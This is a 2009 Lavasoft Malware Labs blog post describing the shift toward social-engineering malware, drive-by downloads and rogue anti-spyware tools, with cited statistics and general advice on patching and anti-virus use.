The Nature of Today's Malware Infections

by Albin on April 22nd, 2009 in Security Tips.

The nature of malware infections has changed during the past years. A long time ago, malware and viruses were spread in much less sophisticated ways. (1) Times are not the same anymore because malware authors constantly invent new intellectual ways to compromise machines. The target has moved from the actual computer to full focus on users. Lavasoft Malware Labs has seen a major increase of obfuscated downloads which make use of social engineering tricks. Nowadays, users oftentimes infect their own machine by making an interactive choice. It’s all from lure-text, together with email attachments to URL-links and online fake scanners.

The average Joe is not aware of what is happening behind the scenes. They only use the Internet as a daily instrument for shopping, social networking, reading, blogging, bank business, games, etc.

It’s even possible to be lured on legitimate websites - malware authors just redirect victims to sites which connect to servers hosting malware. In a blink of an eye, a jungle of new suspicious applications are running in stealth in the background without any user interaction. This stealth method is called a drive-by download and it often leads to even more social engineering tricks. The most common scenario (social engineering trick) is that a rogue anti-spyware application (fraud tool) ends up on the system and asks the user to purchase a registered version to remove threats which do not exist.

Drive by downloads make use of vulnerabilities in the current web browser and may download, for example, Java and PHP scripts which are executed on the local machine. The scripts are developed to connect to remote servers hosting malicious exploits.

Researchers at ScanSafe have stats that show a major increase of browser attack infections during the last decade. (1)

“74 percent of all malware spotted in the third quarter 2008 came from visits to compromised Web sites.” (1)

The Google Anti-Malware team also made an in depth investigation of billions of web pages. The result was sensational - more than three million URL’s were exposed to drive-by malware downloads. (1)

The test results from Google and ScanSafe indicate that the probability to be exposed by this sort of attack is high. The easiest prevention methods are to constantly install the latest patches for web browsers, Windows OS and other frequently used third party applications. Most of the popular browsers (Mozilla, Internet Explorer and Opera) have features to block blacklisted sites. (1) They also contain functionality for disabling and controls for various scripts. Install anti-spyware/anti-virus applications and make sure to keep the definition file updated. The most important thing is to use common sense while surfing the web.

(1) VirusList, Drive-by Downloads. “The Web Under Siege”. h**p:// viruslist.com/en/analysis?pubid=204792056. Retrieved on 2009-04-22

Albin Bodahl 

Lavasoft Malware Labs